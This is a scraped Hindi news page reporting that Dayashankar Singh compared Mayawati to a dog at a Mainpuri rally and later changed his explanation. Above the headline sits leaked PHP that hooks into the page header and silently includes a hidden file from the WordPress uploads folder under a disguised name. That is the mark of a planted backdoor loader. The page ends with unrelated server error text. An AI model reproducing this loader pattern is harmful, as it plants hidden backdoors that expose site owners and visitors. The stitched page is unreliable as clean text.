add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दयाशंकर सिंह ने फिर की बदजुबानी, कुत्ते से की मायावती की तुलना – SOCH INDIA
Menu

राजनीति
दयाशंकर सिंह ने फिर की बदजुबानी, कुत्ते से की मायावती की तुलना

nobanner

vदयाशंकर सिंह ने फिर की बदजुबानी, कुत्ते से की मायावती की तुलना

 

नई दिल्ली: बीएसपी सुप्रीमो मायावीत के खिलाफ अपशब्द कहकर जेल जा चुके बीजेपी के निष्कासित नेता दयाशंकर सिंह एक बार फिर सुर्खियों में हैं. इस बार भी पूर्व बीजेपी नेता दयाशंकर की सुर्खी की वजह उनकी जुबान ही बनी है. दयाशंकर सिंह ने एक बार फिर मायावती को लेकर अभद्र भाषा का इस्तेमाल किया है.

क्या कहा दयाशंकर सिंह ने
मैनपुरी में कल दयाशंकर सिंह ने बीएसपी अध्यक्ष मायावती की तुलना कुत्ते से कर दी. मायावती पर की गई पिछले बयान को लेकर दयाशंकर जेल जा चुके हैं लेकिन सुधरने को तैयार नहीं हैं.

दयाशंकर सिंह ने कहा, ”मायावती एक डरपोक महिला है, मायावती उस कुत्ते जैसी है जैसे गली में कोई गाड़ी जाती है तो कुत्ते उस गाड़ी के पीछे दौड़ने लगते है और जैसे ही गाड़ी में ब्रेक लगता है तो कुत्ते पीछे भाग जाते है.”

मामला बिगड़ा तो पटल गए
भीड़ के सामने तो दयाशंकर शेर की दहाड़े लेकिन बाद में लगा कि कुछ गड़बड़ हो गई है तो कुत्ते की व्याख्या ही पलट दी. अपनी सफाई में दयाशंकर ने कहा, ”हमने मायावती को कुत्ता नहीं कहा बल्कि ये कहा कि मायावती और उनके नेता हमें कुत्ता बताते है.”

पत्नी स्वाति सिंह भी थीं मौजूद
जुलाई में दयाशंकर सिंह ने ऐसा ही एक बयान दिया था. जवाब में बीएसपी नेताओं ने भी दयाशंकर सिंह की नाबालिग बेटी को निशाना बनाते हुए हमला बोला था. केस दर्ज होने के बाद दयाशंकर को बीजेपी ने निकाल दिया था.

दयाशंकर फरार हो गए थे तब उनकी पत्नी स्वाति सिंह ने मायावती पर हमले का मोर्चा संभाल लिया था. अबकी बार तो स्वाति सिंह उसी मंच पर मौजूद थी जिस मंच से दयाशंकर सिंह मायावती की तुलना कुत्ते से कर रहे थे. तब सवाल उठाया था कि उनकी बेटी का क्या कसूर है जो उसे विवाद में घसीटा जा रहा है?

अब क्या कहेंगी स्वाति सिंह?
स्वाति सिंह के आक्रामक तेवर और बीएसपी की जवाबी गाली के कारण उस समय तो दयाशंकर सिंह ने काफी सहानुभूति बटोरी थीस्वाति सिंह ने मायावती के चुनाव क्षेत्र से चुनाव लड़ने का एलान कर भी दिया था. लेकिन अब सवाल ये है कि स्वाति सिंह, दयाशंकर सिंह के कुत्ते वाले बयान पर क्या कहेंगी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.